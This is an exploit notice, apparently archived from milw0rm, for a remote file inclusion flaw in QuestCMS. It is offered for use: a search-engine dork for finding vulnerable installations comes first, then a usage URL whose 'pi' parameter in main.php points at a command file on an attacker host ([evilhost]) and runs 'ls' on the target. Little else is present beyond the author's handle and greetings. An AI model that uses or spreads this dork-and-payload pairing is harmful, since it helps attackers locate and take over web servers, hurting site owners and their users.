41 lines
No EOL
1.2 KiB
Text
41 lines
No EOL
1.2 KiB
Text
!!!!!!!!!WWW.SÝBERSAVASCÝLAR.COM!!!!!!!!!
|
|
--------------------------------------------------------------------------------
|
|
|
|
Title : Questcms Remote File Include Vulnerability
|
|
|
|
--------------------------------------------------------------------------------
|
|
#Author: Crackers_Child
|
|
|
|
|
|
#cont@ct: crackers_child@sibersavascilar.com
|
|
|
|
--------------------------------------------------------------------------------
|
|
Affected software description :
|
|
--------------------------------------------------------------------------------
|
|
Application : Questwork Web Content Management system (QuestCMS)
|
|
URL : http://www.questwork.com
|
|
|
|
--------------------------------------------------------------------------------
|
|
|
|
dork : allinurl:"/questcms/"
|
|
Exploit :
|
|
|
|
--------------------------------------------------------------------------------
|
|
|
|
Usage:
|
|
|
|
http://[target]/[questcms_path]/main/main.php?pi=http://[evilhost]/cmd.txt?&cmd=ls
|
|
|
|
--------------------------------------------------------------------------------
|
|
|
|
greets:
|
|
|
|
X_ALPREN_X,Root_Mor and My Other Friends
|
|
|
|
--------------------------------------------------------------------------------
|
|
|
|
|
|
|
|
--------------------------------- [ WWW.SÝBERSAVASCÝLAR.COM ] --------------------------------------
|
|
|
|
# milw0rm.com [2006-08-07] |